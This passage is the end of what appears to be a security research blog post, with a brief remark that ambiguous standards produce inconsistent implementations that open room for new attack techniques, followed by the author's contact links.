At the same time, it is worth noting that wherever standards and specifications are not clearly defined or ambiguous, there will be discrepancies in understanding among developers who implement the standards. This can lead to inconsistencies between various languages, libraries, frameworks, and software that follow the standard implementation. Such inconsistencies are fertile ground for creating new attack techniques.

Keep in touch

If you have any questions or ideas for research directions, please feel free to contact me:

Email: hdrw1024@gmail.com
Twitter: https://twitter.com/RuiShang9
Blog: https://shangrui-hash.github.io/en/
Medium: https://medium.com/@hdrw1024
Github: https://github.com/ShangRui-hash
